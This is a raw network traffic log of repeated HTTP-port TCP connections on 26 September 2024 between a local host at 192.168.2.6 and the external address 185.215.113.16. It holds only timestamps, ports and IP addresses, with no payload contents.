Sep 26, 2024 15:42:06.331922054 CEST	80	52322	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:06.331998110 CEST	80	52321	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:06.332128048 CEST	52321	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:06.332142115 CEST	52322	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:06.332247019 CEST	52322	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:06.337362051 CEST	80	52322	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:07.408618927 CEST	80	52322	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:07.408725977 CEST	52322	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:07.409511089 CEST	52322	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:07.414550066 CEST	80	52322	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:07.632118940 CEST	80	52322	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:07.632215023 CEST	52322	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:07.747586012 CEST	52322	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:07.747915030 CEST	52323	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:07.752897024 CEST	80	52323	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:07.752933979 CEST	80	52322	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:07.753011942 CEST	52323	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:07.753034115 CEST	52322	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:07.753185034 CEST	52323	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:07.758157015 CEST	80	52323	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:08.455849886 CEST	80	52323	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:08.456003904 CEST	52323	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:08.456764936 CEST	52323	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:08.461817026 CEST	80	52323	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:08.693679094 CEST	80	52323	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:08.693908930 CEST	52323	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:08.810313940 CEST	52323	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:08.810734987 CEST	52324	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:08.815634012 CEST	80	52323	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:08.815705061 CEST	80	52324	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:08.815757990 CEST	52323	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:08.815798044 CEST	52324	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:08.815917015 CEST	52324	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:08.821141005 CEST	80	52324	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:09.586147070 CEST	80	52324	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:09.586441040 CEST	52324	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:09.587032080 CEST	52324	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:09.591953993 CEST	80	52324	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:09.810935020 CEST	80	52324	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:09.811181068 CEST	52324	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:09.919689894 CEST	52324	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:09.919939041 CEST	52325	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:09.924967051 CEST	80	52325	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:09.925057888 CEST	80	52324	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:09.925081968 CEST	52325	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:09.925107956 CEST	52324	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:09.925278902 CEST	52325	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:09.931828976 CEST	80	52325	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:10.620050907 CEST	80	52325	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:10.620168924 CEST	52325	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:10.620804071 CEST	52325	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:10.625624895 CEST	80	52325	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:10.918925047 CEST	80	52325	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:10.919294119 CEST	52325	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:11.028803110 CEST	52325	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:11.029201984 CEST	52327	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:11.034414053 CEST	80	52325	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:11.034466028 CEST	80	52327	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:11.034488916 CEST	52325	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:11.034544945 CEST	52327	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:11.034682989 CEST	52327	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:11.039608002 CEST	80	52327	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:11.746453047 CEST	80	52327	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:11.746524096 CEST	52327	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:11.749627113 CEST	52327	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:11.754985094 CEST	80	52327	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:11.977494955 CEST	80	52327	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:11.977618933 CEST	52327	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:12.091221094 CEST	52327	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:12.091510057 CEST	52328	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:12.096528053 CEST	80	52328	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:12.096666098 CEST	80	52327	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:12.096716881 CEST	52328	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:12.096718073 CEST	52328	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:12.099596977 CEST	52327	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:12.101707935 CEST	80	52328	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:12.825663090 CEST	80	52328	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:12.825757027 CEST	52328	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:12.826402903 CEST	52328	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:12.831238031 CEST	80	52328	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:13.132277012 CEST	80	52328	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:13.132371902 CEST	52328	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:13.247529984 CEST	52328	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:13.247901917 CEST	52329	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:13.252942085 CEST	80	52328	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:13.252975941 CEST	80	52329	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:13.253011942 CEST	52328	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:13.253078938 CEST	52329	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:13.253243923 CEST	52329	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:13.258260965 CEST	80	52329	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:13.999247074 CEST	80	52329	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:13.999331951 CEST	52329	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:14.000117064 CEST	52329	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:14.005016088 CEST	80	52329	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:14.223839045 CEST	80	52329	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:14.223923922 CEST	52329	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:14.325778008 CEST	52329	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:14.326112986 CEST	52330	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:14.331060886 CEST	80	52330	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:14.331161976 CEST	52330	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:14.331346989 CEST	52330	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:14.331509113 CEST	80	52329	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:14.331569910 CEST	52329	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:14.336229086 CEST	80	52330	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:15.051147938 CEST	80	52330	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:15.051240921 CEST	52330	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:15.051896095 CEST	52330	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:15.056986094 CEST	80	52330	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:15.282052994 CEST	80	52330	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:15.282176018 CEST	52330	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:15.405298948 CEST	52330	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:15.405575037 CEST	52331	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:15.410732031 CEST	80	52331	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:15.410835981 CEST	52331	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:15.411016941 CEST	80	52330	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:15.411072969 CEST	52330	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:15.411087990 CEST	52331	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:15.416215897 CEST	80	52331	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:16.301153898 CEST	80	52331	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:16.301229000 CEST	52331	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:16.301928997 CEST	52331	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:16.308284044 CEST	80	52331	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:16.588774920 CEST	80	52331	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:16.588860035 CEST	52331	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:16.701031923 CEST	52331	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:16.701402903 CEST	52332	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:16.706660032 CEST	80	52332	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:16.706789970 CEST	52332	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:16.706948996 CEST	52332	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:16.707562923 CEST	80	52331	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:16.707626104 CEST	52331	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:16.712151051 CEST	80	52332	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:17.627240896 CEST	80	52332	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:17.627327919 CEST	52332	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:17.627991915 CEST	52332	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:17.633389950 CEST	80	52332	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:17.858223915 CEST	80	52332	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:17.858427048 CEST	52332	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:17.971216917 CEST	52332	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:17.971962929 CEST	52333	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:17.976803064 CEST	80	52332	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:17.976875067 CEST	52332	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:17.976934910 CEST	80	52333	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:17.977025032 CEST	52333	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:17.978853941 CEST	52333	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:17.983863115 CEST	80	52333	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:18.756419897 CEST	80	52333	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:18.756675005 CEST	52333	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:18.757503986 CEST	52333	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:18.762458086 CEST	80	52333	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:18.986959934 CEST	80	52333	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:18.987086058 CEST	52333	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:19.091279984 CEST	52333	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:19.091619015 CEST	52334	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:19.096580029 CEST	80	52334	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:19.096668959 CEST	52334	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:19.096729994 CEST	80	52333	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:19.096788883 CEST	52334	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:19.096788883 CEST	52333	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:19.101912975 CEST	80	52334	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:19.846638918 CEST	80	52334	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:19.846754074 CEST	52334	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:19.847347021 CEST	52334	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:19.852350950 CEST	80	52334	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:20.087435961 CEST	80	52334	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:20.087604046 CEST	52334	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:20.202408075 CEST	52334	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:20.202697992 CEST	52335	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:20.207833052 CEST	80	52335	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:20.207964897 CEST	52335	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:20.208029985 CEST	80	52334	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:20.208102942 CEST	52334	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:20.208187103 CEST	52335	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:20.213319063 CEST	80	52335	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:20.926371098 CEST	80	52335	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:20.926426888 CEST	52335	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:20.927572966 CEST	52335	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:20.934186935 CEST	80	52335	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:21.175602913 CEST	80	52335	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:21.175753117 CEST	52335	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:21.278824091 CEST	52335	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:21.279217005 CEST	52336	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:21.284290075 CEST	80	52336	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:21.284558058 CEST	52336	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:21.284813881 CEST	52336	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:21.284933090 CEST	80	52335	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:21.285021067 CEST	52335	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:21.289699078 CEST	80	52336	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:22.017019033 CEST	80	52336	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:22.017158985 CEST	52336	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:22.017832994 CEST	52336	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:22.022819042 CEST	80	52336	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:22.249780893 CEST	80	52336	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:22.249917984 CEST	52336	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:22.357156038 CEST	52336	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:22.357482910 CEST	52337	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:22.362474918 CEST	80	52336	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:22.362545967 CEST	80	52337	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:22.362581015 CEST	52336	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:22.362656116 CEST	52337	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:22.362879038 CEST	52337	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:22.367907047 CEST	80	52337	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:23.112827063 CEST	80	52337	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:23.112934113 CEST	52337	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:23.113713026 CEST	52337	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:23.118849039 CEST	80	52337	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:23.345959902 CEST	80	52337	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:23.346079111 CEST	52337	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:23.451049089 CEST	52337	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:23.451922894 CEST	52338	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:23.456880093 CEST	80	52337	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:23.456902027 CEST	80	52338	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:23.456974983 CEST	52337	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:23.457010984 CEST	52338	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:23.457170963 CEST	52338	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:23.462033987 CEST	80	52338	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:24.193552017 CEST	80	52338	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:24.193814993 CEST	52338	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:24.194499016 CEST	52338	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:24.200201035 CEST	80	52338	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:24.504070044 CEST	80	52338	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:24.504312992 CEST	52338	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:24.607425928 CEST	52338	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:24.607707977 CEST	52339	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:24.612756014 CEST	80	52339	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:24.612870932 CEST	52339	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:24.612977028 CEST	80	52338	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:24.612999916 CEST	52339	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:24.613039017 CEST	52338	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:24.617917061 CEST	80	52339	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:25.323458910 CEST	80	52339	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:25.323575974 CEST	52339	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:25.324562073 CEST	52339	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:25.329492092 CEST	80	52339	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:25.556170940 CEST	80	52339	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:25.556230068 CEST	52339	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:25.669497967 CEST	52339	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:25.669909000 CEST	52340	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:25.674840927 CEST	80	52339	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:25.674916983 CEST	52339	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:25.675426960 CEST	80	52340	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:25.675502062 CEST	52340	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:25.675662994 CEST	52340	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:25.680846930 CEST	80	52340	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:26.370754004 CEST	80	52340	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:26.370850086 CEST	52340	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:26.371593952 CEST	52340	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:26.376799107 CEST	80	52340	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:26.597754002 CEST	80	52340	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:26.597964048 CEST	52340	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:26.700927973 CEST	52340	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:26.701160908 CEST	52341	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:26.707317114 CEST	80	52341	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:26.707437038 CEST	52341	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:26.707465887 CEST	80	52340	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:26.707528114 CEST	52341	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:26.707618952 CEST	52340	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:26.713711977 CEST	80	52341	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:27.595855951 CEST	80	52341	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:27.596066952 CEST	52341	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:27.597522974 CEST	52341	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:27.602411985 CEST	80	52341	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:27.964509010 CEST	80	52341	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:27.964689016 CEST	52341	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:28.092092991 CEST	52341	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:28.092468023 CEST	52343	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:28.097507000 CEST	80	52343	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:28.097583055 CEST	80	52341	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:28.097604036 CEST	52343	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:28.097666025 CEST	52341	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:28.098059893 CEST	52343	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:28.104357958 CEST	80	52343	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:28.869976997 CEST	80	52343	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:28.870100021 CEST	52343	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:28.873342991 CEST	52343	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:28.878187895 CEST	80	52343	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:29.109827995 CEST	80	52343	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:29.109941006 CEST	52343	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:29.216509104 CEST	52343	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:29.216937065 CEST	52344	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:29.221748114 CEST	80	52343	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:29.221784115 CEST	80	52344	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:29.221817017 CEST	52343	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:29.221880913 CEST	52344	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:29.222044945 CEST	52344	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:29.227170944 CEST	80	52344	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:29.941618919 CEST	80	52344	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:29.941765070 CEST	52344	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:29.944001913 CEST	52344	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:29.949505091 CEST	80	52344	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:30.217442036 CEST	80	52344	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:30.217562914 CEST	52344	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:30.326189041 CEST	52344	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:30.326584101 CEST	52345	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:30.331681013 CEST	80	52344	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:30.331768990 CEST	52344	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:30.332226992 CEST	80	52345	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:30.332317114 CEST	52345	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:30.332622051 CEST	52345	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:30.337841988 CEST	80	52345	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:31.184906006 CEST	80	52345	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:31.184971094 CEST	52345	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:31.185894012 CEST	52345	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:31.190814972 CEST	80	52345	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:31.422466993 CEST	80	52345	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:31.422616005 CEST	52345	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:31.530224085 CEST	52345	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:31.530849934 CEST	52346	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:31.535851002 CEST	80	52346	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:31.535953999 CEST	52346	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:31.537796974 CEST	80	52345	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:31.537866116 CEST	52345	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:31.542525053 CEST	52346	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:31.547688007 CEST	80	52346	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:32.235276937 CEST	80	52346	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:32.235409975 CEST	52346	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:32.236218929 CEST	52346	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:32.241154909 CEST	80	52346	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:32.463326931 CEST	80	52346	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:32.463553905 CEST	52346	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:32.575779915 CEST	52346	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:32.576149940 CEST	52347	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:32.581118107 CEST	80	52347	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:32.581228971 CEST	52347	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:32.581398964 CEST	80	52346	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:32.581437111 CEST	52347	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:32.581454039 CEST	52346	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:32.586437941 CEST	80	52347	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:33.301938057 CEST	80	52347	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:33.302071095 CEST	52347	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:33.343888998 CEST	52347	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:33.348953009 CEST	80	52347	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:33.573101044 CEST	80	52347	185.215.113.16	192.168.2.6
